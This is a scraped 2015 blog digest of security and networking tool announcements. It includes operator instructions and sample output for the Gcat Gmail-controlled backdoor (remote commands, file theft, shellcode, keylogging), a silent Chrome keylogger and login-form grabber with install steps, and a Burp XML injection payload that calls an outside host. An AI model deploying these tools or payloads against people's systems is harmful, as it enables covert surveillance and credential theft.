I2P is an anonymous network, exposing a simple layer that applications can use to anonymously and securely send messages to each other....

I2P - The Invisible Internet Project

Monday, September 28, 2015 Sensei Fedon 0 Comments

I2P is an anonymous network, exposing a simple layer that applications can use to anonymously and securely send messages to each other. The network itself is strictly message based (a la IP), but there is a library available to allow reliable streaming communication on top of it (a la TCP). All communication is end to end encrypted (in total there are four layers of encryption used when sending a message), and even the end points ("destinations") are cryptographic identifiers (essentially a pair of public keys).

How does it work?

To anonymize the messages sent, each client application has their I2P "router" build a few inbound and outbound "tunnels" - a sequence of peers that pass messages in one direction (to and from the client, respectively). In turn, when a client wants to send a message to another client, the client passes that message out one of their outbound tunnels targeting one of the other client's inbound tunnels, eventually reaching the destination. Every participant in the network chooses the length of these tunnels, and in doing so, makes a tradeoff between anonymity, latency, and throughput according to their own needs. The result is that the number of peers relaying each end to end message is the absolute minimum necessary to meet both the sender's and the receiver's threat model.
The first time a client wants to contact another client, they make a query against the fully distributed "network database" - a custom structured distributed hash table (DHT) based off the Kademlia algorithm. This is done to find the other client's inbound tunnels efficiently, but subsequent messages between them usually includes that data so no further network database lookups are required.

What can you do with it?

Within the I2P network, applications are not restricted in how they can communicate - those that typically use UDP can make use of the base I2P functionality, and those that typically use TCP can use the TCP-like streaming library. We have a generic TCP/I2P bridge application ("I2PTunnel") that enables people to forward TCP streams into the I2P network as well as to receive streams out of the network and forward them towards a specific TCP/IP address.
I2PTunnel is currently used to let people run their own anonymous website ("eepsite") by running a normal webserver and pointing an I2PTunnel 'server' at it, which people can access anonymously over I2P with a normal web browser by running an I2PTunnel HTTP proxy ("eepproxy"). In addition, we use the same technique to run an anonymous IRC network (where the IRC server is hosted anonymously, and standard IRC clients use an I2PTunnel to contact it). There are other application development efforts going on as well, such as one to build an optimized swarming file transfer application (a la BitTorrent), a distributed data store (a la Freenet / MNet), and a blogging system (a fully distributed LiveJournal), but those are not ready for use yet.
I2P is not inherently an "outproxy" network - the client you send a message to is the cryptographic identifier, not some IP address, so the message must be addressed to someone running I2P. However, it is possible for that client to be an outproxy, allowing you to anonymously make use of their Internet connection. To demonstrate this, the "eepproxy" will accept normal non-I2P URLs (e.g. "http://www.i2p.net") and forward them to a specific destination that runs a squid HTTP proxy, allowing simple anonymous browsing of the normal web. Simple outproxies like that are not viable in the long run for several reasons (including the cost of running one as well as the anonymity and security issues they introduce), but in certain circumstances the technique could be appropriate.
The I2P development team is an open group, welcome to all who are interested in getting involved, and all of the code is open source. The core I2P SDK and the current router implementation is done in Java (currently working with both sun and kaffe, gcj support planned for later), and there is a simple socket based API for accessing the network from other languages (with a C library available, and both Python and Perl in development). The network is actively being developed and has not yet reached the 1.0 release, but the current roadmap describes our schedule.


TeemIp is an open source, WEB based, IP Adress Management (IPAM) tool that provides comprehensive IP Management capabilities. It allow...

TeemIp – IP Address Management Solution

Monday, September 28, 2015 Sensei Fedon 0 Comments

TeemIp is an open source, WEB based, IP Adress Management (IPAM) tool that provides comprehensive IP Management capabilities. It allows you to manage your IPv4 and IPv6 spaces through a simple and powerful user interface: track user requests, allocate IPs, manage your IP plan and your subnet space in accordance with best in class IP Management practices. At the same time, its CMDB allows you to manage your IT inventory and to link your CIs to the IPs they use.
TeemIp can be installed as a standalone application (default download) or as an additional module of open source iTop product (ITSM & CMDB OpenSource): http://sourceforge.net/projects/itop.


  • IPv4 and IPv6 Registration
  • IPv4 and IPv6 Subnet & Range Management – Subnet calculator
  • IPv4 and IPv6 Plans Management with nesting capabilities
  • Delegation of IP space from parent to child organizations
  • Capacity Planning
  • Extended and customizable CMDB
  • Enhanced linkage capabilities between IPs and network devices or systems
  • Management of VLANs, DNS Domains, WAN Links, AS Numbers, VRFs…
  • Helpdesk & User Portal
  • Proactive mail Notifications on capacity thresholds
  • CSV import tool for all data
  • Consistency audit to check data quality
  • Multi Customer Environment supporting overlapping IP spaces
  • Data synchronization (data federation)
  • History on all data
  • … on top of iTop powerfull engine.
Check the online demo of TeemIp  at:


A stealthy Python based backdoor that uses Gmail as a command and control server. Setup For this to work you need: A Gm...

Gcat - A stealthy Backdoor that uses Gmail as a command and control server

Monday, September 28, 2015 Sensei Fedon 0 Comments

A stealthy Python based backdoor that uses Gmail as a command and control server.
For this to work you need:
  • A Gmail account (Use a dedicated account! Do not use your personal one!)
  • Turn on "Allow less secure apps" under the security settings of the account
This repo contains two files:
  • gcat.py a script that's used to enumerate and issue commands to available clients
  • implant.py the actual backdoor to deploy
In both files, edit the gmail_user and gmail_pwd variables with the username and password of the account you previously setup.
You're probably going to want to compile implant.py into an executable using Pyinstaller

optional arguments:
  -h, --help            show this help message and exit
  -v, --version         show program's version number and exit
  -id ID                Client to target
  -jobid JOBID          Job id to retrieve

  -list                 List available clients
  -info                 Retrieve info on specified client

  Commands to execute on an implant

  -cmd CMD              Execute a system command
  -download PATH        Download a file from a clients system
  -exec-shellcode FILE  Execute supplied shellcode on a client
  -screenshot           Take a screenshot
  -lock-screen          Lock the clients screen
  -force-checkin        Force a check in
  -start-keylogger      Start keylogger
  -stop-keylogger       Stop keylogger
  • Once you've deployed the backdoor on a couple of systems, you can check available clients using the list command:
#~ python gcat.py -list
f964f907-dfcb-52ec-a993-543f6efc9e13 Windows-8-6.2.9200-x86
90b2cd83-cb36-52de-84ee-99db6ff41a11 Windows-XP-5.1.2600-SP3-x86
The output is a UUID string that uniquely identifies the system and the OS the implant is running on
  • Let's issue a command to an implant:
#~ python gcat.py -id 90b2cd83-cb36-52de-84ee-99db6ff41a11 -cmd 'ipconfig /all'
[*] Command sent successfully with jobid: SH3C4gv
Here we are telling 90b2cd83-cb36-52de-84ee-99db6ff41a11 to execute ipconfig /all, the script then outputs the jobid that we can use to retrieve the output of that command
  • Lets get the results!
#~ python gcat.py -id 90b2cd83-cb36-52de-84ee-99db6ff41a11 -jobid SH3C4gv     
DATE: 'Tue, 09 Jun 2015 06:51:44 -0700 (PDT)'
FG WINDOW: 'Command Prompt - C:\Python27\python.exe implant.py'
CMD: 'ipconfig /all'

Windows IP Configuration

        Host Name . . . . . . . . . . . . : unknown-2d44b52
        Primary Dns Suffix  . . . . . . . : 
        Node Type . . . . . . . . . . . . : Unknown
        IP Routing Enabled. . . . . . . . : No
        WINS Proxy Enabled. . . . . . . . : No

-- SNIP --
  • That's the gist of it! But you can do much more as you can see from the usage of the script! ;)


PHP Frontend to work with the SQLMAP JSON API Server (sqlmapapi.py) to allow for a Web GUI to drive near full functionality of SQLMAP!...

SQLMAP-Web-GUI - Web GUI to drive near full functionality of SQLMAP

Monday, September 28, 2015 Sensei Fedon 0 Comments

PHP Frontend to work with the SQLMAP JSON API Server (sqlmapapi.py) to allow for a Web GUI to drive near full functionality of SQLMAP!
Here is a few quick videos to show that almost all of your usual SQLMAP command line functionality is still possible via this Web GUI.

Demo against: Windows 2003 Server, IIS/6.0 + ASP + MS-SQL 2005

Demo against: Linux (CentOS), Apache, MySQL, PHP

  • Linux, Apache, PHP (check your favorite distro's wiki or forum pages, or use google)
    • PHP 5.3+ is suggested, older versions not tests so mileage may vary
  • Python and any SQLMAP dependencies (refer to their wiki for any help there)
  • Clone this repo to your machine
    • Edit the sqlmap/inc/config.php file so the paths all point to the right locations on your system
    • Copy the entire sqlmap/ directory and contents to your web root directory (cd SQLMAP-Web-GUI && cp -R sqlmap/ /var/www/)
    • When you want to use, simply fire up the sqlmap API server (python /home/user/tools/sqlmap/sqlmapapi.py -s)
    • Then you can navigate to the Web GUI address in your Browser to begin (firefox


HTTPie (pronounced aych-tee-tee-pie ) is a command line HTTP client . Its goal is to make CLI interaction with web services as human-fr...

HTTPie - a CLI, cURL-like tool for humans

Monday, September 28, 2015 Sensei Fedon 0 Comments

HTTPie (pronounced aych-tee-tee-pie) is a command line HTTP client. Its goal is to make CLI interaction with web services as human-friendly as possible. It provides a simple http command that allows for sending arbitrary HTTP requests using a simple and natural syntax, and displays colorized output. HTTPie can be used for testing, debugging, and generally interacting with HTTP servers.
HTTPie is written in Python, and under the hood it uses the excellent Requests and Pygments libraries.

Main Features
  • Expressive and intuitive syntax
  • Formatted and colorized terminal output
  • Built-in JSON support
  • Forms and file uploads
  • HTTPS, proxies, and authentication
  • Arbitrary request data
  • Custom headers
  • Persistent sessions
  • Wget-like downloads
  • Python 2.6, 2.7 and 3.x support
  • Linux, Mac OS X and Windows support
  • Plugins
  • Documentation
  • Test coverage

On Mac OS X, HTTPie can be installed via Homebrew:
$ brew install httpie
Most Linux distributions provide a package that can be installed using the system package manager, e.g.:
# Debian-based distributions such as Ubuntu:
$ apt-get install httpie

# RPM-based distributions:
$ yum install httpie
A universal installation method (that works on Windows, Mac OS X, Linux, …, and provides the latest version) is to use pip:
# Make sure we have an up-to-date version of pip and setuptools:
$ pip install --upgrade pip setuptools

$ pip install --upgrade httpie
(If pip installation fails for some reason, you can try easy_install httpie as a fallback.)

Development version
The latest development version can be installed directly from GitHub:
# Mac OS X via Homebrew
$ brew install httpie --HEAD

# Universal
$ pip install --upgrade https://github.com/jkbrzt/httpie/tarball/master


Hello World:
$ http httpie.org
$ http [flags] [METHOD] URL [ITEM [ITEM]]
See also http --help.

Custom HTTP method, HTTP headers and JSON data:
$ http PUT example.org X-API-Token:123 name=John
Submitting forms:
$ http -f POST example.org hello=World
See the request that is being sent using one of the output options:
$ http -v example.org
Use Github API to post a comment on an issue with authentication:
$ http -a USERNAME POST https://api.github.com/repos/jkbrzt/httpie/issues/83/comments body='HTTPie is awesome!'
Upload a file using redirected input:
$ http example.org < file.json
Download a file and save it via redirected output:
$ http example.org/file > file
Download a file wget style:
$ http --download example.org/file
Use named sessions to make certain aspects or the communication persistent between requests to the same host:
$ http --session=logged-in -a username:password httpbin.org/get API-Key:123$ http --session=logged-in httpbin.org/headers
Set a custom Host header to work around missing DNS records:
$ http localhost:8000 Host:example.com

What follows is a detailed documentation. It covers the command syntax, advanced usage, and also features additional examples.

HTTP Method

The name of the HTTP method comes right before the URL argument:
$ http DELETE example.org/todos/7
Which looks similar to the actual Request-Line that is sent:
DELETE /todos/7 HTTP/1.1
When the METHOD argument is omitted from the command, HTTPie defaults to either GET (with no request data) or POST (with request data).

Request URL

The only information HTTPie needs to perform a request is a URL. The default scheme is, somewhat unsurprisingly, http://, and can be omitted from the argument – http example.org works just fine.
Additionally, curl-like shorthand for localhost is supported. This means that, for example :3000 would expand to http://localhost:3000 If the port is omitted, then port 80 is assumed.
$ http :/foo
GET /foo HTTP/1.1
Host: localhost
$ http :3000/bar
GET /bar HTTP/1.1
Host: localhost:3000
$ http :
GET / HTTP/1.1
Host: localhost
If you find yourself manually constructing URLs with querystring parameters on the terminal, you may appreciate the param==value syntax for appending URL parameters so that you don't have to worry about escaping the & separators. To search for HTTPie on Google Images you could use this command:
$ http GET www.google.com search==HTTPie tbm==isch
GET /?search=HTTPie&tbm=isch HTTP/1.1


Burp Suite is an integrated platform for performing security testing of web applications. Its various tools work seamlessly together to...

Burp Suite Professional 1.6.26 - The Leading Toolkit for Web Application Security Testing

Monday, September 28, 2015 Sensei Fedon 0 Comments

Burp Suite is an integrated platform for performing security testing of web applications. Its various tools work seamlessly together to support the entire testing process, from initial mapping and analysis of an application's attack surface, through to finding and exploiting security vulnerabilities.
Burp gives you full control, letting you combine advanced manual techniques with state-of-the-art automation, to make your work faster, more effective, and more fun.
 Burp Suite is an integrated platform for performing security testing of web applications. Its various tools work seamlessly together to support the entire testing process, from initial mapping and analysis of an application's attack surface, through to finding and exploiting security vulnerabilities.
Burp gives you full control, letting you combine advanced manual techniques with state-of-the-art automation, to make your work faster, more effective, and more fun.
Burp Suite contains the following key components:
  • An intercepting Proxy, which lets you inspect and modify traffic between your browser and the target application.
  • An application-aware Spider, for crawling content and functionality.
  • An advanced web application Scanner, for automating the detection of numerous types of vulnerability.
  • An Intruder tool, for performing powerful customized attacks to find and exploit unusual vulnerabilities.
  • A Repeater tool, for manipulating and resending individual requests.
  • A Sequencer tool, for testing the randomness of session tokens.
  • The ability to save your work and resume working later.
  • Extensibility, allowing you to easily write your own plugins, to perform complex and highly customized tasks within Burp.
Burp is easy to use and intuitive, allowing new users to begin working right away. Burp is also highly configurable, and contains numerous powerful features to assist the most experienced testers with their work.

Release Notes v1.6.26
This release adds the ability to detect blind server-side XML/SOAP injection by triggering interactions with Burp Collaborator.
Previously, Burp Scanner has detected XML/SOAP injection by submitting some XML-breaking syntax like:

and analyzing responses for any resulting error messages.
Burp now sends payloads like:
<nzf xmlns="http://a.b/"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://a.b/ http://kuiqswhjt3era6olyl63pyd.burpcollaborator.net/nzf.xsd">
and reports an appropriate issue based on any observed interactions (DNS or HTTP) that reach the Burp Collaborator server.
Note that this type of technique is effective even when the original parameter value does not contain XML, and there is no indication within the request or response that XML/SOAP is being used on the server side.
The new scan check uses both schema location and XInclude to cause the server-side XML parser to interact with the Collaborator server.
In addition, when the original parameter value does contain XML being submitted by the client, Burp now also uses the schema location and XInclude techniques to try to induce external service interactions. (We believe that Burp is now aware of all available tricks for inducing a server-side XML parser to interact with an external network service. But we would be very happy to hear of any others that people know about.)


Integrated Penetration-Test Environment Faraday v1.0.12 – Pen Test Environment (IPE) Released Faraday introduces a new con...

Integrated Penetration-Test Environment: Faraday

Monday, September 28, 2015 Sensei Fedon 0 Comments

Integrated Penetration-Test Environment

Faraday v1.0.12 – Pen Test Environment (IPE) Released
Faraday introduces a new concept (IPE) Integrated Penetration-Test Environment a multiuser Penetration test IDE. Designed for distribution, indexation and analysis of the generated data during the process of a security audit.
Integrated Penetration-Test Environment: Faraday Documentation
The main purpose of Faraday is to re-use the available tools in the community to take advantage of them in a multiuser way.
Design for simplicity, users should feel no difference between their own terminal application and the one included in Faraday. Developed with a specialized set of functionalities that help users improve their own work. Do you remember yourself programming without an IDE? Well, Faraday does the same an IDE does for you when programming, but from the perspective of a penetration test.
Next Generation Penetration Testing
Integrated Penetration-Test Environment: Faraday


Modern Linux (Tested Debian / Ubuntu * / Kali / Backtrack)
  • Python 2.6.x and 2.7.x
  • Qt3
  • CouchDB >= 1.2.0
  • The following python libs:
    • mockito
    • couchdbkit
    • whoosh
    • argparse
    • psycopg2
    • IPy
    • requests

Integrated Penetration-Test Environment: Faraday Integrated Penetration-Test Environment: Faraday


Download the latest tarball by clicking here
Preferably, you can download by cloning the Git repository:
$ git clone https://github.com/infobyte/faraday.git faraday-dev
$ cd faraday-dev
$ ./install

Integrated Penetration-Test Environment: Faraday installation guide

 Faraday has more that 40+ supported tools:
Integrated Penetration-Test Environment: Faraday Integrated Penetration-Test Environment: Faraday
Source && Download
Integrated Penetration-Test Environment: Faraday download


A keylogger and form grabber for Google Chrome that runs as an extension ChromeLogger is a keylogger and form grabber that ...

Chrome Keylogger Extension: ChromeLogger

Monday, September 28, 2015 Sensei Fedon 0 Comments

A keylogger and form grabber for Google Chrome
that runs as an extension

ChromeLogger is a keylogger and form grabber that runs as a Google Chrome extension. Since it’s a Chrome addon, it’s compatible with the latest version of Chrome on all OS’s (Windows, Mac, Linux).
ChromeLogger will save all keystrokes typed into webpages that are opened by Chrome. There’s also an option to capture form submissions (ie, search boxes, login forms). After installing, ChromeLogger will be completely silent and will automatically start recording keylogs.


ChromeLogger works by injecting javascript into all loaded web pages. The payload records keypresses using event listeners and saves them to Chrome’s storage. Unlike other browser keyloggers, ChromeLogger runs natively in Chrome (on all OS’s) without the need to install additional software.  The form grabber works in a similar way. Javascript is injected and event listeners are added for all forms. When a form is submitted, its data is saved to ChromeLogger’s storage. This allows form data transferred over SSL to be saved in plaintext.

ChromeLogger’s payload is written in pure JS and the log viewer is built using AngularJS

Installation Instructions

  1. Download the ChromeLogger extension.
  2. Open a new window/tab and go to: chrome://extensions/ (the extensions page).
  3. Enable “Developer Mode” (top right).
  4. Drag and drop the downloaded ChromeLogger extension into the Extensions page.

To view ChromeLogger logs and enable the form grabber, open your Extensions page, find ChromeLogger, and click on “Options”.

Source && Download

Chrome Keylogger Extension: ChromeLogger download Chrome Keylogger Extension: ChromeLogger Chrome Keylogger Extension: ChromeLogger


Just as webpages grew bloated with ads, so too have ad blockers grown bloated with little-used filtering rules and features that sap t...

A New, Faster Ad Blocker: Adblock Fast

Monday, September 28, 2015 Sensei Fedon 0 Comments

A New, Faster Ad Blocker: Adblock Fast
Just as webpages grew bloated with ads, so too have ad blockers grown bloated with little-used filtering rules and features that sap their speed and hog your computer or device’s disk space, CPU cycles, and memory. Adblock Fast runs a mere 7 optimized filtering rules to accelerate pages 8x more but consume 6x less system resources than other ad blockers do.

Try Adblock Fast:
  • Chrome
  • opera-icon
  • IOS_9_Logo

A new, faster ad blocker for Chrome, Opera, and iOS 9

A New, Faster Ad Blocker: Adblock Fast benchmark

Exactly how much faster ?

1. 7,000x fewer filtering rules per page.

  • AdBlock: 49,002 rules
  • Adblock Plus: 49,002 rules
  • Adblock Fast: 7 rules

2. 7x less kilobytes of disk.

  • AdBlock: 843 KB
  • Adblock Plus: 543 KB
  • Adblock Fast: 97 KB

3. Accelerates page loading 8x.

  • No ad blocker: 3.17s (control)
  • AdBlock: 2.84s (0.33s faster)
  • Adblock Plus: 3.23s (0.06s slower)
  • Adblock Fast: 2.10s (1.07s faster)

4. Consumes 3x lower percentage of CPU.

  • AdBlock: 19.4%
  • Adblock Plus: 20.3%
  • Adblock Fast: 6.6%

5. Consumes 3x less megabytes of memory.

  • AdBlock: 162.5 MB
  • Adblock Plus: 158.0 MB
  • Adblock Fast: 58.5 MB

Source && Download

A New, Faster Ad Blocker: Adblock Fast download